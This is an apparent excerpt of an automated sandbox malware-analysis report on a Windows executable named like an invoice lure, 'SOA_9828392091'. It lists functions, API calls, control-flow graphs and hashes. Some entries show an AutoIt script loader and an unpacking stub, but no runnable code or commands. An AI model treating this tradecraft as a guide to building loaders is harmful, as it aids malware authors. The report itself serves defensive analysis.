                                      control_flow_graph 1295 94ddc0-94de4f call 93d7f7 GetVersionExW call 936a63 call 94dfb4 call 936571 1304 94de55-94de56 1295->1304 1305 9a24c8-9a24cb 1295->1305 1306 94de92-94dea2 call 94df77 1304->1306 1307 94de58-94de63 1304->1307 1308 9a24cd 1305->1308 1309 9a24e4-9a24e8 1305->1309 1326 94dea4-94dec1 GetCurrentProcess call 94df5f 1306->1326 1327 94dec7-94dee1 1306->1327 1312 9a244e-9a2454 1307->1312 1313 94de69-94de6b 1307->1313 1315 9a24d0 1308->1315 1310 9a24ea-9a24f3 1309->1310 1311 9a24d3-9a24dc 1309->1311 1310->1315 1318 9a24f5-9a24f8 1310->1318 1311->1309 1316 9a245e-9a2464 1312->1316 1317 9a2456-9a2459 1312->1317 1319 9a2469-9a2475 1313->1319 1320 94de71-94de74 1313->1320 1315->1311 1316->1306 1317->1306 1318->1311 1322 9a247f-9a2485 1319->1322 1323 9a2477-9a247a 1319->1323 1324 94de7a-94de89 1320->1324 1325 9a2495-9a2498 1320->1325 1322->1306 1323->1306 1330 9a248a-9a2490 1324->1330 1331 94de8f 1324->1331 1325->1306 1332 9a249e-9a24b3 1325->1332 1326->1327 1346 94dec3 1326->1346 1328 94df31-94df3b GetSystemInfo 1327->1328 1329 94dee3-94def7 call 94e00c 1327->1329 1335 94df0e-94df1a 1328->1335 1343 94df29-94df2f GetSystemInfo 1329->1343 1344 94def9-94df01 call 94dff4 GetNativeSystemInfo 1329->1344 1330->1306 1331->1306 1337 9a24bd-9a24c3 1332->1337 1338 9a24b5-9a24b8 1332->1338 1340 94df21-94df26 1335->1340 1341 94df1c-94df1f FreeLibrary 1335->1341 1337->1306 1338->1306 1341->1340 1345 94df03-94df07 1343->1345 1344->1345 1345->1335 1349 94df09-94df0c FreeLibrary 1345->1349 1346->1327 1349->1335
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0094DDEC
                                      • GetCurrentProcess.KERNEL32(00000000,009CDC38,?,?), ref: 0094DEAC
                                      • GetNativeSystemInfo.KERNELBASE(?,009CDC38,?,?), ref: 0094DF01
                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0094DF0C
                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0094DF1F
                                      • GetSystemInfo.KERNEL32(?,009CDC38,?,?), ref: 0094DF29
                                      • GetSystemInfo.KERNEL32(?,009CDC38,?,?), ref: 0094DF35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                      • String ID:
                                      • API String ID: 3851250370-0
                                      • Opcode ID: b7ffa674f257732f1c7dd6ec87194d2b90d91ea52a872c383c2cebe444062a8a
                                      • Instruction ID: f58107e95e7d27b8824ebebce26d44c36276e6190936e47f39f23d5be69e90f2
                                      • Opcode Fuzzy Hash: b7ffa674f257732f1c7dd6ec87194d2b90d91ea52a872c383c2cebe444062a8a
                                      • Instruction Fuzzy Hash: 3661C0B581B384CFCF15CF6898C19EE7FB8AF6A300B1989D9D8459F207D624C908CB65
                                      Function 0093406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1367 93406b-934083 CreateStreamOnHGlobal 1368 9340a3-9340a6 1367->1368 1369 934085-93409c FindResourceExW 1367->1369 1370 9340a2 1369->1370 1371 9a4f16-9a4f25 LoadResource 1369->1371 1370->1368 1371->1370 1372 9a4f2b-9a4f39 SizeofResource 1371->1372 1372->1370 1373 9a4f3f-9a4f4a LockResource 1372->1373 1373->1370 1374 9a4f50-9a4f6e 1373->1374 1374->1370
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0093407B
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0093449E,?,?,00000000,00000001), ref: 00934092
                                      • LoadResource.KERNEL32(?,00000000,?,?,0093449E,?,?,00000000,00000001,?,?,?,?,?,?,009341FB), ref: 009A4F1A
                                      • SizeofResource.KERNEL32(?,00000000,?,?,0093449E,?,?,00000000,00000001,?,?,?,?,?,?,009341FB), ref: 009A4F2F
                                      • LockResource.KERNEL32(0093449E,?,?,0093449E,?,?,00000000,00000001,?,?,?,?,?,?,009341FB,00000000), ref: 009A4F42
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: ff9a00ecd1055882da6d63e61bc509a6ca9e4b44e7ee3c2b7f638d1f75ea8456
                                      • Instruction ID: a3a6e75aca505a9bb0848a162118022b191b0014a55572ad4e7c8f072e7d697a
                                      • Opcode Fuzzy Hash: ff9a00ecd1055882da6d63e61bc509a6ca9e4b44e7ee3c2b7f638d1f75ea8456
                                      • Instruction Fuzzy Hash: 0C117070204701BFE7258B65ED48F277BBDEBC5B61F10412CF61286250DB71EC009A21
                                      Function 00A55F70 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1506 a55f70-a55f7d 1507 a55f8a-a55f8f 1506->1507 1508 a55f91 1507->1508 1509 a55f80-a55f85 1508->1509 1510 a55f93 1508->1510 1511 a55f86-a55f88 1509->1511 1512 a55f98-a55f9a 1510->1512 1511->1507 1511->1508 1513 a55fa3-a55fa7 1512->1513 1514 a55f9c-a55fa1 1512->1514 1515 a55fb4-a55fb7 1513->1515 1516 a55fa9 1513->1516 1514->1513 1519 a55fc0-a55fc2 1515->1519 1520 a55fb9-a55fbe 1515->1520 1517 a55fd3-a55fd8 1516->1517 1518 a55fab-a55fb2 1516->1518 1521 a55feb-a55fed 1517->1521 1522 a55fda-a55fe3 1517->1522 1518->1515 1518->1517 1519->1512 1520->1519 1525 a55ff6 1521->1525 1526 a55fef-a55ff4 1521->1526 1523 a55fe5-a55fe9 1522->1523 1524 a5605a-a5605d 1522->1524 1523->1525 1527 a56062-a56065 1524->1527 1528 a55fc4-a55fc6 1525->1528 1529 a55ff8-a55ffb 1525->1529 1526->1525 1534 a56067-a56069 1527->1534 1532 a55fcf-a55fd1 1528->1532 1533 a55fc8-a55fcd 1528->1533 1530 a56004 1529->1530 1531 a55ffd-a56002 1529->1531 1530->1528 1536 a56006-a56008 1530->1536 1531->1530 1537 a56025-a56034 1532->1537 1533->1532 1534->1527 1535 a5606b-a5606e 1534->1535 1535->1527 1538 a56070-a5608c 1535->1538 1539 a56011-a56015 1536->1539 1540 a5600a-a5600f 1536->1540 1541 a56044-a56051 1537->1541 1542 a56036-a5603d 1537->1542 1538->1534 1543 a5608e 1538->1543 1539->1536 1544 a56017 1539->1544 1540->1539 1541->1541 1546 a56053-a56055 1541->1546 1542->1542 1545 a5603f 1542->1545 1547 a56094-a56098 1543->1547 1548 a56022 1544->1548 1549 a56019-a56020 1544->1549 1545->1511 1546->1511 1550 a560df-a560e2 1547->1550 1551 a5609a-a560b0 LoadLibraryA 1547->1551 1548->1537 1549->1536 1549->1548 1553 a560e5-a560ec 1550->1553 1552 a560b1-a560b6 1551->1552 1552->1547 1554 a560b8-a560ba 1552->1554 1555 a56110-a56140 VirtualProtect * 2 1553->1555 1556 a560ee-a560f0 1553->1556 1558 a560c3-a560d0 GetProcAddress 1554->1558 1559 a560bc-a560c2 1554->1559 1557 a56144-a56148 1555->1557 1560 a56103-a5610e 1556->1560 1561 a560f2-a56101 1556->1561 1557->1557 1562 a5614a 1557->1562 1563 a560d2-a560d7 1558->1563 1564 a560d9 ExitProcess 1558->1564 1559->1558 1560->1561 1561->1553 1563->1552
                                      APIs
                                      • LoadLibraryA.KERNEL32(?), ref: 00A560AA
                                      • GetProcAddress.KERNEL32(?,00A4EFF9), ref: 00A560C8
                                      • ExitProcess.KERNEL32(?,00A4EFF9), ref: 00A560D9
                                      • VirtualProtect.KERNELBASE(00930000,00001000,00000004,?,00000000), ref: 00A56127
                                      • VirtualProtect.KERNELBASE(00930000,00001000), ref: 00A5613C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                      • String ID:
                                      • API String ID: 1996367037-0
                                      • Opcode ID: 7910460ea75652dd409634807c7bc135f860178a6960760f3cb9bbc842a5b657
                                      • Instruction ID: a4d9ef3be9cd1a993a07fc5d145d0cf31d82c7121b8f6bcc33926172db800784
                                      • Opcode Fuzzy Hash: 7910460ea75652dd409634807c7bc135f860178a6960760f3cb9bbc842a5b657
                                      • Instruction Fuzzy Hash: 9951F7B2A557525BD7208FB8CC90660B7A4FB513267680738DEE2C73C6E7B45C0D8760
                                      Function 00976CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,009A2F49), ref: 00976CB9
                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00976CCA
                                      • FindClose.KERNEL32(00000000), ref: 00976CDA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
                                      • Opcode ID: 18c5978efc5370ae3fd1f84d1d6e5b67a020ecef6ca794cd0416f6803cb072cf
                                      • Instruction ID: 945abd97760056c2b04345dd2a05502b22d188a01ad13965ca6dd3b054605c40
                                      • Opcode Fuzzy Hash: 18c5978efc5370ae3fd1f84d1d6e5b67a020ecef6ca794cd0416f6803cb072cf
                                      • Instruction Fuzzy Hash: 44E0D832829811578214673CED0D4E9376CEA05339F104715F5F5C11D0F770ED0456D5
                                      Function 00943200 Relevance: 1.0, Instructions: 986COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID:
                                      • API String ID: 3964851224-0
                                      • Opcode ID: f9907dc175f5363cd2188d50e4ec1eb52c8e9bd5b0f1c8aa096a79ed258a6ecd
                                      • Instruction ID: e252fe90723ee202bac27cc394c72f0e233449573f674592e145225879e8925b
                                      • Opcode Fuzzy Hash: f9907dc175f5363cd2188d50e4ec1eb52c8e9bd5b0f1c8aa096a79ed258a6ecd
                                      • Instruction Fuzzy Hash: 539277706083019FD724DF28C490F6ABBE5BF89304F14885DE99A8B3A2D775E945CB92
                                      Function 0093E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0093E959
                                      • timeGetTime.WINMM ref: 0093EBFA
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0093ED2E
                                      • TranslateMessage.USER32(?), ref: 0093ED3F
                                      • DispatchMessageW.USER32(?), ref: 0093ED4A
                                      • LockWindowUpdate.USER32(00000000), ref: 0093ED79
                                      • DestroyWindow.USER32 ref: 0093ED85
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093ED9F
                                      • Sleep.KERNEL32(0000000A), ref: 009A5270
                                      • TranslateMessage.USER32(?), ref: 009A59F7
                                      • DispatchMessageW.USER32(?), ref: 009A5A05
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009A5A19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                      • API String ID: 2641332412-570651680
                                      • Opcode ID: 6c0c0666d1835597a96c80f7caa88809cb9b21272a188f4cf71f868a5e6e15b1
                                      • Instruction ID: 9099bcec3c593fd831bc04ef8844d343c9925cec6ed9beb451e46e0956d86853
                                      • Opcode Fuzzy Hash: 6c0c0666d1835597a96c80f7caa88809cb9b21272a188f4cf71f868a5e6e15b1
                                      • Instruction Fuzzy Hash: 9662AF70608341DFDB25DF24C885BAA77E8BF85304F18496DF98A8B2D2DB759844CF92
                                      Function 00965C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___createFile.LIBCMT ref: 00965EC3
                                      • ___createFile.LIBCMT ref: 00965F04
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00965F2D
                                      • __dosmaperr.LIBCMT ref: 00965F34
                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00965F47
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00965F6A
                                      • __dosmaperr.LIBCMT ref: 00965F73
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00965F7C
                                      • __set_osfhnd.LIBCMT ref: 00965FAC
                                      • __lseeki64_nolock.LIBCMT ref: 00966016
                                      • __close_nolock.LIBCMT ref: 0096603C
                                      • __chsize_nolock.LIBCMT ref: 0096606C
                                      • __lseeki64_nolock.LIBCMT ref: 0096607E
                                      • __lseeki64_nolock.LIBCMT ref: 00966176
                                      • __lseeki64_nolock.LIBCMT ref: 0096618B
                                      • __close_nolock.LIBCMT ref: 009661EB
                                        • Part of subcall function 0095EA9C: CloseHandle.KERNELBASE(00000000,009DEEF4,00000000,?,00966041,009DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0095EAEC
                                        • Part of subcall function 0095EA9C: GetLastError.KERNEL32(?,00966041,009DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0095EAF6
                                        • Part of subcall function 0095EA9C: __free_osfhnd.LIBCMT ref: 0095EB03
                                        • Part of subcall function 0095EA9C: __dosmaperr.LIBCMT ref: 0095EB25
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      • __lseeki64_nolock.LIBCMT ref: 0096620D
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00966342
                                      • ___createFile.LIBCMT ref: 00966361
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0096636E
                                      • __dosmaperr.LIBCMT ref: 00966375
                                      • __free_osfhnd.LIBCMT ref: 00966395
                                      • __invoke_watson.LIBCMT ref: 009663C3
                                      • __wsopen_helper.LIBCMT ref: 009663DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                      • String ID: @
                                      • API String ID: 3896587723-2766056989
                                      • Opcode ID: 66c2ebffbde7769ef39ba181537927ceecd2df8081eb80cfbf304209cd310f9e
                                      • Instruction ID: 3d508be7100da99221eaa03bd6079ccc4bd00f4a39ba2868722e9a98f2d9028a
                                      • Opcode Fuzzy Hash: 66c2ebffbde7769ef39ba181537927ceecd2df8081eb80cfbf304209cd310f9e
                                      • Instruction Fuzzy Hash: 2022887190460A9FEF299F68DC65BBD7B79EF41324F254229E821EB2D2C3398D40C791
                                      Function 0095EE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit
                                      • String ID:
                                      • API String ID: 3074181302-0
                                      • Opcode ID: edd53d8981a0e216fe18df01e6f0ca09a5d77b0b7edfdee791054529ed995724
                                      • Instruction ID: 4afc14bde6134e2a8f806badcc1fae46c082c6236d3b85f9275e2c265e6c0ede
                                      • Opcode Fuzzy Hash: edd53d8981a0e216fe18df01e6f0ca09a5d77b0b7edfdee791054529ed995724
                                      • Instruction Fuzzy Hash: 4D328A70A08241CFDB21CF69D850BBDBBB5AF85331F284469EC959F292D7709D4ACB60
                                      Function 0097FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • _wcscpy.LIBCMT ref: 0097FA96
                                      • _wcschr.LIBCMT ref: 0097FAA4
                                      • _wcscpy.LIBCMT ref: 0097FABB
                                      • _wcscat.LIBCMT ref: 0097FACA
                                      • _wcscat.LIBCMT ref: 0097FAE8
                                      • _wcscpy.LIBCMT ref: 0097FB09
                                      • __wsplitpath.LIBCMT ref: 0097FBE6
                                      • _wcscpy.LIBCMT ref: 0097FC0B
                                      • _wcscpy.LIBCMT ref: 0097FC1D
                                      • _wcscpy.LIBCMT ref: 0097FC32
                                      • _wcscat.LIBCMT ref: 0097FC47
                                      • _wcscat.LIBCMT ref: 0097FC59
                                      • _wcscat.LIBCMT ref: 0097FC6E
                                        • Part of subcall function 0097BFA4: _wcscmp.LIBCMT ref: 0097C03E
                                        • Part of subcall function 0097BFA4: __wsplitpath.LIBCMT ref: 0097C083
                                        • Part of subcall function 0097BFA4: _wcscpy.LIBCMT ref: 0097C096
                                        • Part of subcall function 0097BFA4: _wcscat.LIBCMT ref: 0097C0A9
                                        • Part of subcall function 0097BFA4: __wsplitpath.LIBCMT ref: 0097C0CE
                                        • Part of subcall function 0097BFA4: _wcscat.LIBCMT ref: 0097C0E4
                                        • Part of subcall function 0097BFA4: _wcscat.LIBCMT ref: 0097C0F7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                      • String ID: >>>AUTOIT SCRIPT<<<
                                      • API String ID: 2955681530-2806939583
                                      • Opcode ID: bc4b961736168f6a084dfad8179a8148ed267b537f8418b67b477f51feb26b5e
                                      • Instruction ID: 5652a1502b5e5a379955274d7f0b6c8c77b1cbad759a90d745bfdd7738e33003
                                      • Opcode Fuzzy Hash: bc4b961736168f6a084dfad8179a8148ed267b537f8418b67b477f51feb26b5e
                                      • Instruction Fuzzy Hash: B69193725047059FCB24EB55C891F9AB3E8BFD4310F048869F99D97291DB34EA48CB92
                                      Function 0097BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0097BDB4: __time64.LIBCMT ref: 0097BDBE
                                        • Part of subcall function 00934517: _fseek.LIBCMT ref: 0093452F
                                      • __wsplitpath.LIBCMT ref: 0097C083
                                        • Part of subcall function 00951DFC: __wsplitpath_helper.LIBCMT ref: 00951E3C
                                      • _wcscpy.LIBCMT ref: 0097C096
                                      • _wcscat.LIBCMT ref: 0097C0A9
                                      • __wsplitpath.LIBCMT ref: 0097C0CE
                                      • _wcscat.LIBCMT ref: 0097C0E4
                                      • _wcscat.LIBCMT ref: 0097C0F7
                                      • _wcscmp.LIBCMT ref: 0097C03E
                                        • Part of subcall function 0097C56D: _wcscmp.LIBCMT ref: 0097C65D
                                        • Part of subcall function 0097C56D: _wcscmp.LIBCMT ref: 0097C670
                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0097C2A1
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0097C338
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0097C34E
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0097C35F
                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0097C371
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
